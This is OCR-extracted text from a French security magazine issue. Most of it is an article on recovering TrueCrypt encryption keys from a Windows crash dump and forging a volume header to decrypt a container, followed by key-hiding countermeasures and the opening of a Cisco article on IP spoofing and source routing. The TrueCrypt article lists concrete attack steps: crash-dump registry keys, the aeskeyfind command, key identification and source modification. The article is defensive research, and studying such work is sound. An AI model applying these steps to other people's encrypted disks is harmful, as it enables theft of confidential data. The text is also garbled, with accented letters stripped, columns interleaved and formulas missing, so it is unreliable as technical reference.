Il est clair que le SOC nest pas seulement bas sur des outils mais il sagit plutt dune organisation mettre en place et des ressources humaines grer. Il sagit dun projet long terme et en amlioration continue. Le succs de ce projet est totalement dpendant de la diminution du temps ncessaire pour dtecter une attaque et prendre toutes les mesures ncessaires pour la contrer.

propos de l'auteur

Figure 3. Gartner Website

CISSP et actuellement consultant en scurit informatique chez Alliacom, l'auteur a t responsable de la premire quipe CERT en Afrique: CERT-TCC (Computer Emergency Response Team - Tunisian Coordination Center) durant plus de cinq annes. Durant cette priode l'auteur a participer dans plusieurs projets de conseils en scurit l'chelle nationale y compris le sommet mondial pour la socit d'information WSIS Tunis 2005. Il a galement effectu plusieurs interventions dans des vnements internationaux relatifs la scurit informatique (ITU, FIRST, OIC-CERT,etc.). 6/2009 HAKIN9 69

Jrme Bise

TECHNIQUE LA RAM :
Une vulnrabilit avre des FDE
Les systmes de chiffrement de disque la vol (FDe, on the Fly Disk encryption) sont des logiciels permettant d'assurer la confidentialit des donnes. Ces systmes permettent de chiffrer/dchiffrer les donnes d'un disque dur (ou d'un conteneur) lorsque l'on y accde. ils sont compltement transparents pour les utilisateurs (except la saisie dun mot de passe). L'utilisation de FDe est aujourd'hui de plus en plus courante, que ce soit par des entreprises ou des particuliers pour assurer la confidentialit des donnes.

Degr de difficult

ur le march on trouve bon nombre de FDE (Zone Central de Prim'X, DM-Crpyt, Truecrypt, etc.) disponible sur plusieurs plates-formes. Mais qu'elle est le niveau de protection que garantissent ces FDE? La ou certain n'affiche que des rfrences, d'autre sont certifier par la DCSSI, par exemple : Zone Central : EAL 2+, Truecrypt : CSPN.

Cette attaque est donc difficilement ralisable ce qui minimise grandement son impact au niveau oprationnel et donc sa prise en compte par les utilisateurs. Cet article montre grce aux recherches du CITP: la possibilit de mener une telle attaque sans passer obligatoirement par un accs physique, la conduite de cette attaque, de la rcupration des cls au dchiffrement des donnes, les moyens de s'en prmunir.

Cependant malgr ces certifications, des FDE restent vulnrables. Cet article se propose de dmontrer une vulnrabilit commune plusieurs FDE, qu'ils soient propritaires ou non, certifis ou non. Une rcente tude du CITP (Center for Information Technology Policy) de l'universit de Princeton a dmontr qu'il tait possible de rcuprer des cls de chiffrement en RAM (AES et RSA). Cette attaque porte le nom de "Cold Boot". Le principe est de rcuprer les barrettes de RAM pour en extraire les lments secrets. La faisabilit d'une telle attaque implique notamment: un accs physique la machine, qu'elle soit en cours de fonctionnement, un temps de ralisation court (du la faible persistance des donnes en RAM une fois hors tension et au risque dtre dcouvert).

Cet artiCle explique...

Comment rcuprer des cls Aes en rAm. Comment les utiliser pour dchiffrer un disque dur. Quelles solutions mettre en place contre cette menace.

Ce qu'il faut savoir...

savoir utiliser Windows et Linux. La programmation en C/C++. Les bases de la cryptographie. 74 HAKIN9 6/2009

Le but est de sensibiliser les utilisateurs de FDE sur les menaces pesant sur la protection de leurs donnes et de la ralit d'une telle attaque. Les manipulations du code source prsentes dans cet article ou t ralises sous Ubuntu 8.04. Nous n'avons pas choisie de le faire sous Windows en raison de la lourdeur des logiciels ncessaires la compilation du code source et de leurs cot (requiers: Visual Studio 2008, MVSC C++ 1.52, DDK Windows, etc.). De plus les modifications apportes au code source servent de dmonstration pour l'article, ils ne doivent pas tre reproduit pour une utilisation oprationnelle.

LA RAM

Cls dentte KE1 KE2

Entte non chiffr + Master Key + Secondary Key + ...

Mot de passe

PBKDF20
Salt

Listing 1. Erreur du BOSD gnr par crash dump

*** STOP: 0x000000E2 (0x00000000, 0x00000000,0x00000000, 0x00000000) The end-user manually generated the crashdump.

AES AES

Listing 2. Cls rcupres en RAM

606433e1479ba65d746e2d2bbd6a1034 3cab8a95f649e42dd7006e780afeb13c dfea3045db773064d3c2299d8ebc10fd 5ab4140a570c256b53dee55623125108 000102030405060708090a0b0c0d0e0f 101112131415161718191a1b1c1d1e1f

Entte TrueCrypt

Figure 1. Synoptique chiffrement AES-XTS d'un entte Truecrypt

principe

Les manipulations prsentes au cours de cet article ont t ralises avec Truecrypt V6.1a, V6.2. Ce FDE a t certifi CSPN par la DCSII dans sa version 6.0a. Truecrypt permet de faire du chiffrement la vol avec : un disque dur ou une partition, un conteneur, c'est un fichier qui contient les donnes chiffres qui sera mont comme un disque (exemple pris dans cet article), l'ensemble d'un systme d'exploitation.

Lorsque l'on souhaite accder des donnes chiffres dans un conteneur (ou un disque), on est invit saisir son
Volume de creation dente

mot de passe. Une fois saisie, le mot de passe est utilis dans une fonction de drivation de clef (PBKDF2). Cette fonction gnre deux cls (nomm HeaderKeys HK) qui serviront chiffrer/dchiffrer l'entte du conteneur qui contient notamment, les clefs de chiffrements des donnes (nommes MasterKey et SecondaryKey : MK, SK) servant chiffrer nos donnes (le chiffrement utilis dans cet article est AES-XTS cf. Figure 1). Une fois que MK et SK ont t rcupres, elles se trouvent en RAM tant que le conteneur est en cours d'utilisation. Une fois que le volume est dmont, MK et SK sont effaces dfinitivement de la RAM grce la fonction Burn(). Cette fonction est charge deffacer

Ente

Donnes chiffres

Entte de sauvegrade

Remplacement de lente cible Conteneur cible

Injecton de MK et SK

Entte

Donnes chiffres cible

Entte de sauvegrade

Figure 2. Injection de MK et SK et remplacement de l'entte

proprement les donnes en RAM pour empcher de les rcuprer une fois le conteneur dmont. Le principe de lattaque, est de rcuprer lensemble des cls de chiffrement en RAM et de retrouver parmi elles MK et SK. Le nombre de combinaison possible pour n cls rcupres est :. Si on prend un cas dfavorable (en rcuprant 10 cls en RAM), cela faitcombinaisons possibles. C'est--dire que mme dans un cas dfavorable on est loin des 2512 1,3.10154 possibilits. Car mme en passant 1ns par cls il faudrait plus dune vie pour tester toutes les combinaisons en brute force. Pour identifier le bon couple de cls parmi les n rcuprs, il faut dchiffrer les premiers octets du conteneur afin de dterminer si les donnes rcupres correspondent au dbut dun type de systme de fichiers. Lorsque cela est fait on a identifi MK et SK. Cependant, la formule prcdente est valable dans un cas o on connat lalgorithme de chiffrement ainsi que le systme de fichier utilis. Dans le cas contraire on aurait la formule suivante : Une fois que l'on a trouv le bon couple de cl, on va gnrer un faux entte Truecrypt dont on connat le mot de passe et qui contiendra MK et SK. Cet entte sera gnr avec un mot de passe que lon choisira. On sen servira pour remplacer celui du conteneur dchiffrer. Une fois que lon saisira notre mot de passe, Truecrypt dchiffrera notre entte et
6/2009 HAKIN9 75

TECHNIQUE
extraction et identification du couple (MK;sK)
Comme notre utilisateur avait son conteneur mont lors du crash dump, et les cls sont a prsent dans le fichier de dump : MEMORY.DMP. Pour les rcuprer, nous allons utiliser le programme du CITP nomm 'aeskeyfinder'[1] et disponible sous Linux. Ce programme permet de trouver dans un fichier, des lments tant potentiellement des cls de chiffrement AES. Pour cela, il effectue sur chaque bloc de 128 et 256 bits un calcul afin de mesurer son niveau dentropie. Si le niveau est suffisant, lutilitaire enregistre le bloc en tant que cl potentielle.
$ aeskeyfind MEMORY.DMP > liste_clefs.txt

Figure 3. Activation du crash dump prendra le couple (MK ; SK) que nous lui avons donn pour dchiffrer les donnes du conteneur cible (cf. Figure 2). NB : Cet article ne prsente pas de moyen pour rcuprer les cls en RAM et le conteneur cible distance. Car il existe suffisamment de vulnrabilit pour rcuprer un fichiers distance et d'excuter un programme charger de rcuprer des donnes en RAM. La plus value de cet article repose uniquement sur le dchiffrement du conteneur cible (qui reste largement suprieur aux attaques par brute force) et les mthodes permettant de s'en prvenir. qui lexcute, il peut donc y accder. Cette opration ncessite de modifier quelques paramtres du registre (cf. Figure 3): Dans la cl: HKEY_LOCAL_MACHINE\ System\CurrentControlSet\Control\ CrashControl. Il faut positionner les valeurs CarshDumpEnabled 1. Cela cre une copie total de la mmoire RAM dans le fichier dfinit dans la cl DumpFile. La gnration dun crash dump se fait lorsque lOS reoit une interruption IRQ. Dans notre cas, nous allons raliser cette action par une combinaison de touche, en modifiant une des cls suivantes en fonction du type de clavier : Clavier PS/2, positionner la valeur :

la vulnrabilit

Le systme cible est quip de Windows XP SP3 et du FDE Truecrypt. Le conteneur cible utilise lalgorithme de chiffrement et le systme de fichier propos par dfaut (AES-XTS et FAT16). On part de lhypothse que l'utilisateur a mont son conteneur.

HKEY_LOCAL_MACHINE\SYSTEM\ CurrentControlSet\Services\ i8042prt\Parameters\ CrashOnCtrlScroll 1 (REG_DWORD)

Dump mmoire
La premire tape consiste rcuprer le contenu de la RAM. Pour cela, une mthode simple consiste gnrer un crash dump qui va copier tout le contenu de la RAM dans un fichier. Il faut savoir que les pages de la RAM contenant les cls ne sont pas accessibles par les comptes ayant des droits par dfaut. Lavantage du crash dump est que cest le systme

Clavier USB :

HKEY_LOCAL_MACHINE\SYSTEM\

CurrentControlSet\Services\kbdhid\ Parameters\CrashOnCtrlScroll 1 (REG_DWORD)

La combinaison : CTRL droit + SCROLL LOCK + SCROLL LOCK fera apparatre un cran bleu avec le message du Listing 1 et crera la copie de la RAM.

Le Listing 2 contient lensemble des cls retrouves dans la RAM de notre machine de test : Le but maintenant est didentifier le bon couple (MK ;SK). Pour se faire, nous allons dchiffrer une partie du conteneur avec les diffrentes combinaisons de cl (ici ) par systme de fichier, afin didentifier le dbut dun systme de fichier. En ralit, si lon met de ct les hypothses de lattaque ont aurait combinaisons car on a 2 systmes de fichiers et 8 algorithmes de chiffrement disponibles sur la version Windows de Truecrypt. Le systme de fichier par dfaut propos et FAT 16. Nous allons donc tenter de retrouver la suite (46 41 54 31 36 = FAT 16 en ASCII) cf. Figure 4. Le mode de chiffrement AESXTS a besoin dun certain nombre de paramtres pour effectuer une opration de chiffrement ou de dchiffrement (en plus de MK et SK), savoir : Un numro de bloc. Chaque blocs est compos de 16 octets, Un numro dunit, chaque unit est compos de 32 blocs soit 512 octet.

Figure 4. Dbut d'une partition FAT 16

76 HAKIN9 6/2009

Les 65535 premiers octets dun conteneur sont rservs pour lentte, les 65535 suivant sont rservs pour lentte des

LA RAM
volumes cachs. Par consquent notre systme de fichier commence loctet 131072.C'est--dire que si il sagit dun disque en FAT 16 on retrouvera notre suite de nombre dans lunit 100(16), bloque 4 ((131072+48) : 512=256(10)=100(16)). Pour dchiffrer ce bloque il faudrait implmenter lalgorithme de chiffrement AES-XTS, ce qui nest pas une mince affaire. Cependant, Truecrypt fournit un banc de test (cf. Figure 5) qui permettra de dchiffrer rapidement ce bloc. Le Listing 3 donne la valeur chiffre et claire de lunit 100, bloque 3 du conteneur rcupr : Comme nous avons retrouv la suite magique, nous pouvons en dduire deux choses : Le disque chiffr contenu dans le conteneur est au format FAT 16, Le couple (MK;SK) test dans sur le banc de test est le bon.

Listing 3. Identification du systme de fichier

Chiffr : 11D30BC44026B92B6D016BE17930 E99A Dchiffr 4d45202020204641543136202020 0000

Si nous navions pas trouv le bon couple, nous aurions du chang les cls et le systme de fichier potentiel jusqu' identification des deux paramtres prcdents. Si lon reprend notre le cas dfavorable 45 combinaisons de cls. On prend tous les systmes de fichiers proposs par Truecr ypt (NTFS, FAT, EXT2, EXT3) et les 8 huit algorithmes de chiffrement proposs on atteint seulement 45x8x4=1440 possibilit pour un conteneur rcupr sous Linux et 45x2x8=720 sous Windows, soit gre plus quun attach case avec un code trois chiffres. Mme si ces 1440 possibilits tester sont fastidieuses, il est possible dautomatiser cette recherche de cl en implmentant les

algorithmes disponibles et lidentification du systme de fichiers.

Gnration d'un entte Truecrypt et injection de (MK;SK)

Le cas du dchiffrement du conteur cible pose la mme problmatique que celle du dchiffrement du bloque prcdent. Il faut implmenter lalgorithme utilis. Une autre approche plus pragmatique et possible lorsque lon regarde comment fonctionne un volume Truecrypt. Un volume est compos de trois parties (cf. Figure 6). Toutes les informations caractrisant le conteneur et permettant sont dchiffrement sont contenues dans lentte du volume. Cet entte est chiffr partir du mot de passe de lutilisateur et dun sel (cf. Figure 1). La ruse consiste faire gnr Truecrypt un entte dont on connatra le mot de passe et qui contiendra le couple (MK;SK) rcupr cf. Figure 2. Cette manipulation ncessite de modifier le code source de Truecrypt. La gnration des cls de chiffrements se fait lors de la cration du volume. Les cls sont gnres par la fonction : RandomNumberGenerator: :GetData(), dont les 256 premiers bits correspondent MK et le 256 suivants SK. On va donc remplacer lappel de cette fonction par linjection de nos cls cf. Figure7. Une fois le code source modifi, on recompile Truecrypt et on gnre un conteneur de mme taille que la cible avec notre mot de passe. Une fois fait, on sauvegarde lentte de notre conteneur, puis on restaure lentte de la cible avec celui sauvegard (cf. Figure 2). Il ne reste plus qu monter le conteneur cible en saisissant notre mot de passe, et le tour est jou.
6/2009 HAKIN9 77

Figure 5. Banc de test Truecrypt

Conteneur cible Entte de sauvegarde

Entte

Donnes chiffres

Figure 6. Volume Truecrypt

TECHNIQUE
de gnr un image complte de la RAM (cf. KB254649). Ne pas utiliser de compte administrateur, car en cas dattaque toutes les actions malveillantes seront effectus avec les permissions dadministrateur (changement des valeurs du registre, accs la RAM). Malheureusement, ces moyens ne permettent pas de saffranchir dune attaque plus volue. Comme le recours des failles permettant de raliser une llvation de privilge pour accder la RAM envoyer les cls et le conteneur rcupr travers le rseau, etc. La partie suivante donne des moyens garantissant une meilleure scurit. Cela implique un certain nombre de contre-mesures implmenter au niveau logiciel, ou encore lutilisation de certains matriels.

Figure 7. Injection des cls Pour ceux qui serait sceptique sur la faisabilit de cette attaque, il suffit de regarder le gain de temps au niveaux combinatoire comparer une attaque par brute force, mme si on effectue des opration manuelles. On pourrait galement optimiser lattaque de cet article, en faisant lopration de recherche des cls directement dans la partie de la RAM concerne. De cette faon, on naura plus besoin de passer par un crash dump qui ne passe pas inaperue, surtout quand on a 4Go de RAM copier. Il serait possible aussi dautomatiser toute la chane de didentification du couple (MK;SK), de lalgorithme de chiffrement, ainsi que du systme de fichiers utilis et enfin de gnration de lentte truqu. Cette optimisation prendrait peut de temps pour un quipe dingnieurs qualifis, surtout quand on regarde ce que rapporte le vol de donnes confidentielles. Heureusement pour les utilisateurs de ces systmes, on peut mettre en place un ensemble de protections destines diminuer le risque dune telle attaque. La menace rside dans le fait que la cl de chiffrement est prsente en RAM. systmatiquement les disques chiffrs lorsque lon sabsente en verrouillant sa session bien sur. Au cas ou lattaque aurait lieu pendant que Windows est lanc, il faut dans un premier temps dsactiver la fonctionnalit de crash dump permettant

Contre-mesures

Bien que les protections exposes prcdemment constituent un premier

Listing 4. Implmentation partielle du camouflage de cls

//Generating decoy keys int nbKey=(100000-2)/2; clock_t start,end; start = clock (); unsigned char eltSecret[64] = {0x01,0x54,0x33,0xe1,0x99,0x9 b,0xa6,0x5d, 0x80,0x6e,0x2d,0x2b,0xbd,0x6a,0x10,0x34, 0x3c,0xab,0x8a,0x95,0xab,0x49,0xe4,0x2d, 0xd7,0x00,0x6e,0x78,0x0a,0xfe,0xc1,0x3c, 0xdf,0xea,0x30,0x67,0xdb,0x77,0x30,0x64, 0xf3,0xc2,0x29,0x9d,0x8e,0xbc,0x10,0xfd, 0x57,0xb4,0x14,0x0a,0x57,0x0c,0x25,0x6b, 0x53,0xde,0xfc,0x56,0x23,0x12,0x51,0x09}; unsigned char hash[nbKey][64]; sha512(hash[0],eltSecret,64); for(int i=1;i<nbKey;i++) { unsigned char mixedHash[64]; //Mixing eltSecret with previous hash for(int z=0;z<64;z++) mixedHash[z]=eltSecret[z]|hash[i-1][z]; //Generate DecoyKey with mixed hash sha512(hash[i],hash[i-1],64);

Moyens de protections
Bien que cet article rcupre la RAM pendant que Windows est en cours de fonctionnement, lattaque cold boot du CITP ncessite de couper lalimentation de la RAM, de lextraire et den rcuprer le contenu. Un moyen simple de se prvenir de cette attaque, est de dmonter
78 HAKIN9 6/2009 }

end=clock(); printf("%d Decoy keys generate in : %g s\n", nbKey*2,(double)end/CLOCKS_PER_SEC-(double)start/CLOCKS_PER_ SEC);

LA RAM
Une autre consquence de ce systme et la dgradation des performances, car chaque accs disque, il faudra rassembler les cls et les morceler ensuite. Cela entranera fatalement une diminution des performances qui sera plus importante dans le cas dun disque systme. En supposant que le morcellement et le rassemblement prenne 10ms chacun, on serait pnalise de : 85ms pour le cas du disque de donnes, 10s pour le cas du disque systme.

X X X 1

2 X 3 X

X X X X

X X 4 X

X X 4 1

X 1 X X

X 2 X X

X 3 X X

X X 4 1

X 1 X X

X 2 X X

X 3 X X

X 2 X X

X X X X

4 X X 3

X 1 X X

Assemblage cl

Chiffrement Dchiffrement

Morcellement

Figure 8. Procmon rempart contre les attaques sur les FDE, elles sont loin de fournir une protection suffisante pour garantir la confidentialit des donnes. Dautres principes plus efficaces pourraient tre mis en place au niveau logiciel.
1er

cas : Disque de donnes

Morcellement des cls

La premire solution propose consisterait morceler les cls en RAM. Cette solution empche lutilisation de lutilitaire du CITP qui effectue des recherches sur des blocs de 256 bits contigus. Les cls tant morceles, il nest plus possible deffectuer cette analyse. Prenons le cas o lon fragmentera les cls octet par octet. On aurait donc 64 morceaux (2 cls de 256bits) disperser. Le principe est le suivant. Lorsque lon veut accder en lecture ou en criture un fichier, le FDE va rassembler la cl en RAM et effectuer lopration de chiffrement ou de dchiffrement. Une fois termin, les cls seront nouveaux disperses. Ce mode de fonctionnement entranera : une diminution des performances de chiffrement et dchiffrement, la possibilit dattaquer la cl lorsquelle est rassemble en RAM, surtout pour les oprations sur des fichiers volumineux.

Un disque contenant uniquement des donnes a t monitor pendant trente minutes, en tant utilis normalement (modification de fichier txt et visualisation dimages). Il en ressort que durant ces trente minutes 32000 opration on t faites sur les fichiers ce qui reprsente un temps dexcution de 42,3s soit 2,4% du temps total. Par consquent si on morcelle les cls la fin de chaque opration, on diminue le temps exposition lattaque de 97,6%. Ce rsultat est modr en fonction du niveau dutilisation du disque. Car le recours des programmes utilisant plusieurs fichiers (ex : un compilateur), on obtiendra un rsultat moins performant.
2me

Par consquent bien que le morcellement de cl puisse constituer un premier rempart contre les attaques en RAM sur les FDE, il ne garantit pas une protection permanente sur les cls. Un crash dump gnr au bon moment permettrait de les rcuprer.

Camouflage des cls

La deuxime mthode vise augmenter la complexit au niveau combinatoire pour lidentification des cls. Pour cela on pourrait noyer le couple (MK;SK) dans un ensemble de n cls en RAM. De cette manire on rcuprerait n + 2 cls au lieu de 2. Si on prend un ensemble de 1000000 de cls (MK et SK inclus) le nombre de combinaisons possibles est 8.1012. Cependant une telle solution est-elle utilisable et efficace? Ce principe ncessite un certain nombre de conditions et de contraintes pour fonctionner :

cas : Disque systme

Cette fois un disque contenant Windows XP a t monitor pendant 30 minutes. Soit 170000 oprations reprsentant un temps dexcution de 232s, c'est--dire 12,9% du temps de lanalyse. Bien que ce rsultat ne soit pas surprenant, on remarque que lutilisation du morcellement de cl est moins avantageux que dans le cas prcdent.

Mais quels sont les impacts sur les performances sur un disque de donnes et sur un disque systme? Nous allons mesurer de manires qualitatives les consquences de cette approche au niveau des performances sur un disque de donnes et un disque systme. Les mesures ont t ralises avec loutil procmon de Sysinternals (cf. Figure 8).

Figure 9. Algorithme de gnration des cls leurres

6/2009 HAKIN9 79

TECHNIQUE
chaque ouverture du conteneur doit gnrer le mme ensemble de cls. Sinon on pourrait laide de deux dumps identifier les cls similaires, la gnration des cls doit reposer sur un lment secret, Combien de temps faut-il pour gnrer ces n cls, Combien de donnes supplmentaires seront en RAM. dans la Figure 9 (la fonction sha512 utilis est celle du source sha2.h de Truecrypt). Les tests de gnrations ont t effectus sur un PC portable quip d'un Pentium M 1.73GHz et de 1Go de RAM. Les rsultats donne une moyenne de 0,3s pour gnrer 100000 cls, ce qui donne 3s pour gnrer 1000000 de cls. L'implmentation d'une telle solution est donc implmentable. NB : Cet article donne une implmentation partielle de cette contre-mesure pour laisser Truecrypt le choix de son implmentation ou non. L'quipe de Truecrypt a t mise au courant du problme soulev dans cet article ainsi que des contre-mesures proposes.

Sur Internet
http://citp.princeton.edu/memory/ attaque Cold Boot du CITP, http://citp.princeton.edu/memory/code/ code source des outils du CITP dont aeskeyfind http://esec.fr.sogeti.com/blog/ index.php?2008/12/05/44-cspnTruecrypt certification CSPN Truecrypt, http://www.rsa.com/rsalabs/ node.asp?id=2127 Norme RSA PKCS#5 V2.0, http://www.Truecrypt.org/docs/ ?s=volume-format-specification format d'un entte Truecrypt, http://www.Truecrypt.org/docs/?s=aes description de l'algorithmeAES implment par Truecrypt, http://support.microsoft.com/kb/254649 configuration du crash dump, http://support.microsoft.com/kb/244139 gnrer un crash dump, http://technet.microsoft.com/en-us/ sysinternals/bb896645.aspx procmon de Sysinternals, http://www.bull.com/fr/trustway/rci.html cl USB chiffrante RCI de Bull, http://www.myglobull.fr/ disque chiffrant Globull de Bull.

Pour rpondre ces problmatiques, nous allons implmenter partiellement cette solution dans le code source de Truecrypt. Le premier problme consiste gnrer pour chaque conteneur le mme ensemble de n cls partir dun lment secret. Cet lment pourrait tre stock dans lentte dun volume. Dans lexemple suivant, nous allons utiliser une variable de 64 octets comme lment secret. Les n cls seront gnrs avec lalgorithme suivant. Le fait dutiliser llment secret pour la gnration de chaque cl empche un attaquant de rgnrer les cls. Car si chaque cl ntait quun condensat de la prcdente, on pourrait identifier les fausses cls en calculant le hash de chacune et voir si le rsultat trouv correspond une cl rcupre. La fonction utilise pour la gnration des cls est SHA-512. Par consquent deux cls seront gnres en mme temps. Au niveau de la RAM, le tableau suivant prcise pour chaque nombre de cls gnres: le nombre de combinaisons, le temps maximal pour identifier le couple (MK;SK) en testant n cls/sec avec n processeurs, la taille des n cls en RAM.

Protections matriels
Malgr les rsultats obtenus avec les solutions prcdentes, le moyen le plus sr pour contrer ce type d'attaque et d'utiliser des solutions de chiffrement matriels. Ces quipements utilisent des cryptoprocesseurs chargs d'effectuer toutes les oprations caractre cryptographique notamment: le chiffrement, le dchiffrement, la gestion des cls.

On saperoit que pour 1000000 de cls on commence obtenir des performances acceptables, puisquil faudrait 16 ans pour retrouver (MK;SK). Il ne reste plus qu implmenter cette solution pour mesurer le temps ncessaire la gnration de ces n cls. Le Listing 4 prsente l'implmentation partielle de cette mthode pour la gnration de 99998 cls partir de l'algorithme prsent
80 HAKIN9 6/2009

L'avantage de ces solution est que les cls de chiffrement restent l'intrieur du crypto-processeur (elle ne sont jamais rsidente en RAM). Par consquent la rcupration des cls n'est plus qu'une simple opration de lecture en RAM, mais un attaque sur un matriel spcifique. Ces quipements existent sous forme de cl ou de disque dur comme les cl RCI et les disques chiffrant Globull de la socit Bull. Cependant ces solutions sont plutt destines aux entreprises cause de leurs cots.

faille sur Truecrypt, d'autres FDE sont galement vulnrables. Les solutions logicielles proposes n'offrent pas de couverture parfaite mais offrent dj un premier rempart pouvant tre difficile franchir suivant leurs configurations. Il est donc du ressort des diteurs de FDE de prendre en compte ces menaces en intgrant de nouvelles fonctionnalits permettant de lutter contre les attaques en RAM. Remerciements: Laurent Dubeaux : pour son aide et son soutient, ainsi que son ides de morcellement des cls. Laurent Comte : pour son apport sur le fonctionnement des modes de chiffrements.

Conclusion

Bien que les systmes de chiffrement de disque la vole restent un moyen sr pour assurer la protection de ces informations, ils ne sont pas inviolables. Bien que cet article prsente cette

propos des auteurs

L'auteur suit actuellement une formation d'ingnieur en informatique et rseaux de communications par alternance (5me anne). Il ralise son cursus d'ingnieur au sein du service SSI de DCNS au il est charg principalement d'activit en recherche et dveloppement.

TECHNIQUE
Ryan Gamo

A la dcouverte des plateformes de routage scurises CISCO

Cet article recense la plupart des problmatiques lies au routage rseau et la faon de limiter les cas d'abus en utilisant les plateformes Cisco. Chaque cas d'attaque prsent est vridique, certains se sont produits dans des banques qui grent des fonds se chiffrant plusieurs milliards de dollars et dautres se sont limits aux boutiques de petits commerants. Le risque d'attaque sur des rseaux peu ou pas protgs est donc bien rel !

Degr de difficult

Ce que vous devez savoir...

notions de base sur le routage et les plateformes CISCo. notions de base sur les vulnrabilits rseaux - n'importe quel rseau excutant une version antrieure celle d'IoS Version 12.4 devrait tre mis niveau immdiatement.

Ce que vous apprendrez...

Fonctionnement d'un abus du protocole de routage, usurpation (spoofing) d'adresse IP, et technique de source-routing. Comment limiter ces menaces en utilisant les plateformes Cisco. 70 HAKIN9 6/2009

a scurit est un terme relatif, toutefois on s'accorde sur le fait qu'il s'agit de limiter l'exposition aux menaces. Chaque entreprise est consciente des enjeux lis la scurisation de leurs postes et de leurs serveurs, mais peu d'entre elles se proccupent de la scurisation des routeurs - ce qui est en soi, inconcevable ! Toutes les donnes qui sont transmises d'un rseau l'autre doivent passer par un routeur, si ce support matriel est faillible alors les informations envoyes et reues sur chaque hte peuvent tre compromises. Aprs un rapide examen du paramtrage du routeur et des attaques possibles, j'ai constat avec stupfaction qu'un nombre important de rseaux taient mal protgs... Je vais vous prsenter les vulnrabilits les plus courantes ayant trait au routage rseau, puis je vous montrerai comment on peut s'en prmunir grce aux plateformes scurises Cisco. En fin d'article, je vous prsenterai le Top 10 des rgles de scurit respecter lorsque vous disposez d'un routeur. Usurpation d'adresse IP (spoofing) Remarque : Cette attaque porte sur l'usurpation d'identit. Ces attaques se font l'encontre d'ordinateurs ou sous-rseaux distants. Si vous souhaitez en savoir plus, lisez l'article annexe sur la scurisation des rseaux

commuts Cisco ainsi que les techniques permettant de limiter les attaques par usurpation d'adresse sur le mme domaine de diffusion. L'usurpation d'adresse IP est une attaque relativement simple mais puissante. N'importe quel pirate peut l'utiliser l'encontre d'un poste hte sur un rseau distant. Lorsque celle-ci est excute dans un environnement vulnrable, l'usurpation d'adresse peut prendre diverses formes - ce peut tre une simple attaque par dni de service ou des attaques plus avances par abus des relations de confiance. Ces dernires sont un vritable cauchemar pour n'importe quelle entreprise. J'ai entendu parler d'un administrateur rseau malheureux qui avait dbranch tous les cbles rseau des commutateurs, parce quil ne parvenait pas dterminer la provenance exacte de l'attaque. C'est sans nul doute le pire scnario, toutefois il est bon de mettre en garde les administrateurs rseau (peu importe la taille du rseau) sur ce type de menaces. Les attaques par usurpation d'identit et autres script kiddies peuvent provoquer en peu de temps normment de dgts. L'administrateur mettra du temps remonter la source d'autant que ce processus est plutt fastidieux.

ROUTER
Comment a marche ?
Lorsqu'un ordinateur veut communiquer, il envoie des paquets de donnes vers l'adresse IP de l'autre ordinateur qui inclut une adresse de retour (source) permettant la machine de lui rpondre. Une attaque par usurpation d'adresse IP consiste remplacer l'adresse IP de l'expditeur d'un paquet IP par l'adresse IP d'une autre machine, elle permet ainsi un pirate d'envoyer des paquets anonymement. Il ne s'agit pas pour autant d'un changement d'adresse IP, mais d'une " mascarade " de l'adresse IP au niveau des paquets mis. Cette attaque a toutefois ses revers. Le premier problme est l'envoie des donnes. Le pirate n'a pas les moyens de surveiller l'ordinateur cible, il n'est donc pas sr de ce qui se passe de l'autre ct. Le corollaire est qu'un pirate ne pourra pas participer activement toutes les sessions qui ncessitent des numros de squence ou autres autorisations. paquet avec sa table de routage. Le but est de dterminer si cette adresse est bien arrive sur l'interface en question. L'option uRPF dispose de deux modes distincts, qu'il faut matriser strict mode et loose mode ils doivent tous deux tre activs en fonction du port. Strict mode : lorsqu'un paquet arrive jusqu'au routeur, celui-ci doit tre en mesure d'effectuer la correspondance entre l'interface de dpart et celle d'arrive (qui renverra du trafic). Ce mode devrait tre utilis sur les interfaces o le routage est stable et synchrone (le trafic destin aux sousrseaux part de la mme interface que celle par laquelle il est arriv), comme pour la plupart des interfaces d'un LAN. Cette tape de vrification peut permettre de dceler des diffrences entre les chemins attendus et ceux rellement emprunts. Loose mode : Ce mode consiste vrifier si l'adresse source figure parmi la table de routage. Il est plus adapt aux routeurs qui ont des modes de routage asymtrique, par exemple, dans certaines configurations de rseaux WAN. Ce mode n'effectue pas par dfaut d'analyse pousse du trafic. Syntaxe :
ip verify unicast source [allow-default] Router(config)#interface Fa0/0 Router(config-if)#ip verify rx allow-default unicast source reachable-via

source-routing

Exemple d'attaque Dni de service

Meghan est en apparence une employe modle, mais pousse bout elle va vouloir compromettre la scurit du rseau ! Elle n'accepte pas la mise en application d'une nouvelle politique d'entreprise, et est bien dcide se venger en lanant une attaque par Dni de Service l'encontre du serveur de paie. Grce au systme d'exploitation BackTrack 4 sur Live CD, elle tape la seule et unique commande capable de paralyser le serveur : Voir Figure 1.

Une attaque de type source-routing est similaire celle de l'usurpation d'adresse IP (spoofing), d'ailleurs elles vont gnralement de paire. Le sourcerouting permet un pirate de rediriger le trafic rseau d'un routeur vers des routes prdfinies. Utilise seule, celle-ci pourrait permettre une personne malveillante de contourner des listes d'accs, ou certaines appliances de scurit au sein d'un rseau. En revanche si celle-ci est utilise conjointement avec l'usurpation d'identit elle permettrait d'autoriser du trafic malveillant en se faisant passer pour une adresse de confiance vis--vis d'un hte ou simplement en offrant plus d'anonymat au niveau des transactions rseau. Qu'importe la manire, il subsiste un vritable dfaut sur les plateformes de routage Cisco : celui de la possibilit d'une attaque par source-routing. On peut considrer cette faille comme critique. Certaines applications peuvent exploiter cette faille, le trafic de type source-routing doit obligatoirement tre bloqu sur un LAN.

reachable-via {rx | any} [allow-self-ping] [list]

Comment a marche ?
A ses dbuts, le protocole IP tait surtout utilis au niveau industriel pour effectuer des tests et des dpannages. L'utilisateur pouvait dfinir les interfaces de routage sur lesquelles les paquets devaient transiter sans que les routeurs grent cette partie. C'est alors que les options de source-routing se sont rpandues puis normalises. Cet aspect des choses reprsente un risque de scurit en soi, le danger est aggrav par le fait que plusieurs systmes d'exploitation peuvent inverser la direction du routage au moment de rpondre aux paquets reus, un utilisateur malveillant pourrait donc exploiter les modes de conversation bidirectionnels. Plus techniquement, le source-routing se dcline en deux options Strict
6/2009 HAKIN9 71

rx Utilise l'option " strict mode " sur

Dfense
En tant qu'administrateur rseau, vous avez plusieurs options pour empcher des paquets usurps de se croiser sur un rseau, l'une des meilleures options est sans nul doute l'uRPF (Unicast Reverse Path Forwarding) que l'on peut activer sur la plupart des routeurs. L'option uRPF permet d'effectuer une recherche de base spcifique au trafic sur une interface, en comparant l'adresse IP source du

